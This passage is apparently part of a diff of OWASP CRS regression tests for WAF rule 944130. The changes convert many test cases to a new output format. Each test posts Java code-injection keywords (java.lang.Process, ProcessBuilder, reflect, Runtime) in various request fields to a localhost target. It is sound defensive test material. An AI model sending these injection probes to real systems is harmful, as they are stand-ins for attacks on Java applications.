"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.Process" - output: - log_contains: "id \"944130\"" - - test_title: 944130-316 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.Process" + output: + log: + expect_ids: [944130] + - test_id: 316 desc: "Nested XML element value includes keyword java.lang.Process" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.Process" - output: - log_contains: "id \"944130\"" - - test_title: 944130-317 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.Process" + output: + log: + expect_ids: [944130] + - test_id: 317 desc: "Content-Type text/plain includes keyword java.lang.Process" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.lang.Process" - output: - log_contains: "id \"944130\"" - - test_title: 944130-318 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.lang.Process" + output: + log: + expect_ids: [944130] + - test_id: 318 desc: "Content-Type application/json arg value includes keyword java.lang.Process" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.lang.Process\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-319 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.lang.Process\"}" + output: + log: + expect_ids: [944130] + - test_id: 319 desc: "Content-Type application/json arg name includes keyword java.lang.Process" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.lang.Process\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-320 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.lang.Process\": \"test\"}" + output: + log: + expect_ids: [944130] + - test_id: 320 desc: "Argument test includes keyword java.lang.ProcessBuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.lang.ProcessBuilder" - output: - log_contains: "id \"944130\"" - - test_title: 944130-321 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.lang.ProcessBuilder" + output: + log: + expect_ids: [944130] + - test_id: 321 desc: "Argument name includes keyword java.lang.ProcessBuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.ProcessBuilder=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-322 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.ProcessBuilder=test" + output: + log: + expect_ids: [944130] + - test_id: 322 desc: "Cookie test includes keyword java.lang.ProcessBuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.lang.ProcessBuilder - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-323 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.lang.ProcessBuilder + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 323 desc: "Cookie name includes keyword java.lang.ProcessBuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.lang.ProcessBuilder=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-324 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.lang.ProcessBuilder=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 324 desc: "Request header test includes keyword java.lang.ProcessBuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.lang.ProcessBuilder - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-325 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.lang.ProcessBuilder + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 325 desc: "XML attribute value includes keyword java.lang.ProcessBuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-326 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944130] + - test_id: 326 desc: "XML element value includes keyword java.lang.ProcessBuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.ProcessBuilder" - output: - log_contains: "id \"944130\"" - - test_title: 944130-327 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.ProcessBuilder" + output: + log: + expect_ids: [944130] + - test_id: 327 desc: "Nested XML element value includes keyword java.lang.ProcessBuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.ProcessBuilder" - output: - log_contains: "id \"944130\"" - - test_title: 944130-328 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.ProcessBuilder" + output: + log: + expect_ids: [944130] + - test_id: 328 desc: "Content-Type text/plain includes keyword java.lang.ProcessBuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.lang.ProcessBuilder" - output: - log_contains: "id \"944130\"" - - test_title: 944130-329 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.lang.ProcessBuilder" + output: + log: + expect_ids: [944130] + - test_id: 329 desc: "Content-Type application/json arg value includes keyword java.lang.ProcessBuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.lang.ProcessBuilder\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-330 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.lang.ProcessBuilder\"}" + output: + log: + expect_ids: [944130] + - test_id: 330 desc: "Content-Type application/json arg name includes keyword java.lang.ProcessBuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.lang.ProcessBuilder\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-331 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.lang.ProcessBuilder\": \"test\"}" + output: + log: + expect_ids: [944130] + - test_id: 331 desc: "Argument test includes keyword java.lang.reflect" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.lang.reflect" - output: - log_contains: "id \"944130\"" - - test_title: 944130-332 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.lang.reflect" + output: + log: + expect_ids: [944130] + - test_id: 332 desc: "Argument name includes keyword java.lang.reflect" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.reflect=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-333 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.reflect=test" + output: + log: + expect_ids: [944130] + - test_id: 333 desc: "Cookie test includes keyword java.lang.reflect" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.lang.reflect - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-334 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.lang.reflect + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 334 desc: "Cookie name includes keyword java.lang.reflect" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.lang.reflect=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-335 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.lang.reflect=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 335 desc: "Request header test includes keyword java.lang.reflect" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.lang.reflect - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-336 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.lang.reflect + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 336 desc: "XML attribute value includes keyword java.lang.reflect" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-337 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944130] + - test_id: 337 desc: "XML element value includes keyword java.lang.reflect" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.reflect" - output: - log_contains: "id \"944130\"" - - test_title: 944130-338 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.reflect" + output: + log: + expect_ids: [944130] + - test_id: 338 desc: "Nested XML element value includes keyword java.lang.reflect" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.reflect" - output: - log_contains: "id \"944130\"" - - test_title: 944130-339 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.reflect" + output: + log: + expect_ids: [944130] + - test_id: 339 desc: "Content-Type text/plain includes keyword java.lang.reflect" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.lang.reflect" - output: - log_contains: "id \"944130\"" - - test_title: 944130-340 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.lang.reflect" + output: + log: + expect_ids: [944130] + - test_id: 340 desc: "Content-Type application/json arg value includes keyword java.lang.reflect" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.lang.reflect\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-341 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.lang.reflect\"}" + output: + log: + expect_ids: [944130] + - test_id: 341 desc: "Content-Type application/json arg name includes keyword java.lang.reflect" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.lang.reflect\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-342 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.lang.reflect\": \"test\"}" + output: + log: + expect_ids: [944130] + - test_id: 342 desc: "Argument test includes keyword java.lang.Runtime" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.lang.Runtime" - output: - log_contains: "id \"944130\"" - - test_title: 944130-343 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.lang.Runtime" + output: + log: + expect_ids: [944130] + - test_id: 343 desc: "Argument name includes keyword java.lang.Runtime" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 